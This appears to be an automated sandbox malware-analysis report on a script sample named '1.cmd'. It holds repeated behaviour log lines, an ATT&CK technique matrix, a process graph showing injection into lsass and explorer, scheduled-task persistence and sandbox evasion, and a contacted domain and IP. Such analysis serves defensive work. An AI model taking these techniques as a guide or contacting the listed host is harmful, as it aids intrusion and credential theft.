Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-U7ejKPED VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-U7ejKPED VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,37_2_0000000140002300
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C28090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,18_2_0000022123C28090
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.49.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts12
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Obfuscated Files or Information
11
Input Capture
3
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts22
Command and Scripting Interpreter
11
Scheduled Task/Job
813
Process Injection
1
Software Packing
Security Account Manager132
System Information Discovery
SMB/Windows Admin Shares11
Input Capture
1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job
31
Registry Run Keys / Startup Folder
11
Scheduled Task/Job
1
DLL Side-Loading
NTDS471
Security Software Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell
Network Logon Script31
Registry Run Keys / Startup Folder
1
File Deletion
LSA Secrets2
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit
Cached Domain Credentials251
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
Process Injection
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
Hidden Files and Directories
KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525388 Sample: 1.cmd Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 81 azure-winsecure.com 2->81 91 Multi AV Scanner detection for domain / URL 2->91 93 Malicious sample detected (through community Yara rule) 2->93 95 .NET source code references suspicious native API functions 2->95 97 14 other signatures 2->97 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 127 Suspicious powershell command line found 13->127 129 Suspicious command line found 13->129 18 powershell.exe 36 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 131 Writes to foreign memory regions 16->131 133 Modifies the context of a thread in another process (thread injection) 16->133 135 Found suspicious powershell code related to unpacking or dynamic code loading 16->135 137 Injects a PE file into a foreign processes 16->137 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 79 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 18->79 dropped 99 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->99 101 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->101 103 Uses schtasks.exe or at.exe to add and modify task schedules 18->103 111 4 other signatures 18->111 32 cmd.exe 1 18->32         started        35 WerFault.exe 20 16 18->35         started        105 Injects code into the Windows Explorer (explorer.exe) 26->105 107 Contains functionality to inject code into remote processes 26->107 109 Writes to foreign memory regions 26->109 113 3 other signatures 26->113 37 lsass.exe 26->37 injected 39 winlogon.exe 26->39 injected 41 svchost.exe 26->41 injected 43 20 other processes 26->43 signatures8 process9 signatures10 85 Suspicious powershell command line found 32->85 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        87 Writes to foreign memory regions 37->87 process11 process12 51 cmd.exe 1 45->51         started        signatures13 115 Suspicious powershell command line found 51->115 117 Suspicious command line found 51->117 54 powershell.exe 51->54         started        58 conhost.exe 51->58         started        60 WMIC.exe 1 51->60         started        62 4 other processes 51->62 process14 dnsIp15 83 azure-winsecure.com 192.64.119.55, 49861, 50013, 50014 NAMECHEAP-NETUS United States 54->83 119 Creates autostart registry keys with suspicious values (likely registry only malware) 54->119 121 Creates autostart registry keys with suspicious names 54->121 123 Creates an autostart registry key pointing to binary in C:\Windows 54->123 125 7 other signatures 54->125 64 powershell.exe 54->64         started        67 schtasks.exe 54->67         started        69 WerFault.exe 54->69         started        71 WerFault.exe 54->71         started        signatures16 process17 signatures18 89 Injects a PE file into a foreign processes 64->89 73 conhost.exe 64->73         started        75 powershell.exe 64->75         started        77 conhost.exe 67->77         started        process19

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
1.cmd4%ReversingLabs
1.cmd3%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
azure-winsecure.com8%VirustotalBrowse
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.microsoft0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://upx.sf.net0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
http://schemas.micro0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://www.microsoft.co1%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
http://schemas.xmlsoap.org/ws/2004/09/policy0%VirustotalBrowse
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%VirustotalBrowse
http://schemas.xmlsoap.org/wsdl/erties0%VirustotalBrowse
https://aka.ms/pscore680%URL Reputationsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://github.com/Pester/Pester1%VirustotalBrowse
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%VirustotalBrowse
http://Passport.NET/tb0%VirustotalBrowse
http://schemas.xmlsoap.org/wsdl/soap12/0%VirustotalBrowse
http://docs.oasis-open.org/ws-sx/ws-trust/2005120%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
azure-winsecure.com
192.64.119.55
truefalseunknown
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F2783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
http://crl.microsoftpowershell.exe, 00000007.00000002.2143087471.000001A697909000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2475973230.000002A7E1F25000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmpfalseunknown
https://go.micropowershell.exe, 00000023.00000002.2477927278.000002A7E3703000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.microsoft.copowershell.exe, 00000019.00000002.3053661070.0000016A83A50000.00000004.00000001.00020000.00000000.sdmpfalseunknown
https://contoso.com/Licensepowershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Iconpowershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://upx.sf.netAmcache.hve.10.drfalse
  • URL Reputation: safe
unknown
https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqMicrosoft-Windows-PushNotification-Platform%4Operational.evtx.49.drfalse
    unknown
    https://aka.ms/pscore6powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.7.drfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.microsvchost.exe, 00000032.00000002.3031906020.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://github.com/Pester/Pesterpowershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmpfalseunknown
    https://aka.ms/pscore6xGapowershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmpfalse
      unknown
